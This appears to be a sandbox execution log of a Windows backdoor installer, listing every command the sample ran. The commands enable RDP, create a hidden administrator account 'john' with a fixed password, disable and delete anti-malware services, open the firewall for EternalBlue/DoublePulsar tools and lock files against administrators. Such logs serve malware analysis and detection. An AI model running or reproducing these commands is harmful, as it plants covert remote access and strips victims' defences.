- C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im Rar.exe | Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im Rar.exe | Kills process with taskkill
- C:\Windows\SysWOW64\timeout.exe | timeout 3 | Delays execution with timeout.exe
- C:\Windows\SysWOW64\chcp.com | chcp 1251
- C:\rdp\Rar.exe | "Rar.exe" e -p555 db.rar | Executes dropped EXE
- C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im Rar.exe | Kills process with taskkill
- C:\Windows\SysWOW64\timeout.exe | timeout 2 | Delays execution with timeout.exe
- C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
- C:\Windows\SysWOW64\reg.exe | reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
- C:\Windows\SysWOW64\reg.exe | reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
- C:\Windows\SysWOW64\netsh.exe | netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
- C:\Windows\SysWOW64\net.exe | net.exe user "john" "12345" /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user "john" "12345" /add
- C:\Windows\SysWOW64\chcp.com | chcp 1251
- C:\Windows\SysWOW64\net.exe | net localgroup "Администраторы" "John" /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
- C:\Windows\SysWOW64\net.exe | net localgroup "Administratorzy" "John" /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
- C:\Windows\SysWOW64\net.exe | net localgroup "Administrators" John /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup "Administrators" John /add
- C:\Windows\SysWOW64\net.exe | net localgroup "Administradores" John /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup "Administradores" John /add
- C:\Windows\SysWOW64\net.exe | net localgroup "Пользователи удаленного рабочего стола" John /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
- C:\Windows\SysWOW64\net.exe | net localgroup "Пользователи удаленного управления" John /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
- C:\Windows\SysWOW64\net.exe | net localgroup "Remote Desktop Users" John /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
- C:\Windows\SysWOW64\net.exe | net localgroup "Usuarios de escritorio remoto" John /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
- C:\Windows\SysWOW64\net.exe | net localgroup "Uzytkownicy pulpitu zdalnego" John /add
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
- C:\rdp\RDPWInst.exe | "RDPWInst.exe" -i -o | Executes dropped EXE; Modifies WinLogon; Drops file in Program Files directory
- C:\Windows\SYSTEM32\netsh.exe | netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
- C:\rdp\RDPWInst.exe | "RDPWInst.exe" -w | Executes dropped EXE
- C:\Windows\SysWOW64\reg.exe | reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
- C:\Windows\SysWOW64\net.exe | net accounts /maxpwage:unlimited
- C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 accounts /maxpwage:unlimited
- C:\Windows\SysWOW64\attrib.exe | attrib +s +h "C:\Program Files\RDP Wrapper\*.*" | Drops file in Program Files directory; Views/modifies file attributes
- C:\Windows\SysWOW64\attrib.exe | attrib +s +h "C:\Program Files\RDP Wrapper" | Drops file in Program Files directory; Views/modifies file attributes
- C:\Windows\SysWOW64\attrib.exe | attrib +s +h "C:\rdp" | Views/modifies file attributes
- C:\Windows\SysWOW64\timeout.exe | timeout 2 | Delays execution with timeout.exe
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc start appidsvc
- C:\Windows\SysWOW64\sc.exe | sc start appidsvc
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc start appmgmt
- C:\Windows\SysWOW64\sc.exe | sc start appmgmt
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
- C:\Windows\SysWOW64\sc.exe | sc config appidsvc start= auto
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
- C:\Windows\SysWOW64\sc.exe | sc config appmgmt start= auto
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc delete swprv
- C:\Windows\SysWOW64\sc.exe | sc delete swprv
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop mbamservice
- C:\Windows\SysWOW64\sc.exe | sc stop mbamservice
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
- C:\Windows\SysWOW64\sc.exe | sc stop bytefenceservice
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
- C:\Windows\SysWOW64\sc.exe | sc delete bytefenceservice
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc delete mbamservice
- C:\Windows\SysWOW64\sc.exe | sc delete mbamservice
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc delete crmsvc
- C:\Windows\SysWOW64\sc.exe | sc delete crmsvc
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc delete "windows node"
- C:\Windows\SysWOW64\sc.exe | sc delete "windows node"
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
- C:\Windows\SysWOW64\sc.exe | sc stop Adobeflashplayer
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
- C:\Windows\SysWOW64\sc.exe | sc delete AdobeFlashPlayer
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop MoonTitle
- C:\Windows\SysWOW64\sc.exe | sc stop MoonTitle
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
- C:\Windows\SysWOW64\sc.exe | sc delete MoonTitle"
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
- C:\Windows\SysWOW64\sc.exe | sc stop clr_optimization_v4.0.30318_64
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
- C:\Windows\SysWOW64\sc.exe | sc delete clr_optimization_v4.0.30318_64"
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
- C:\Windows\SysWOW64\sc.exe | sc stop MicrosoftMysql
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
- C:\Windows\SysWOW64\sc.exe | sc delete MicrosoftMysql
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall set allprofiles state on
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
- C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
- C:\Windows\SysWOW64\icacls.exe | icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
- C:\Windows\SysWOW64\icacls.exe | icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F) | Modifies file permissions
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
- C:\Windows\SysWOW64\icacls.exe | icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F) | Modifies file permissions
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
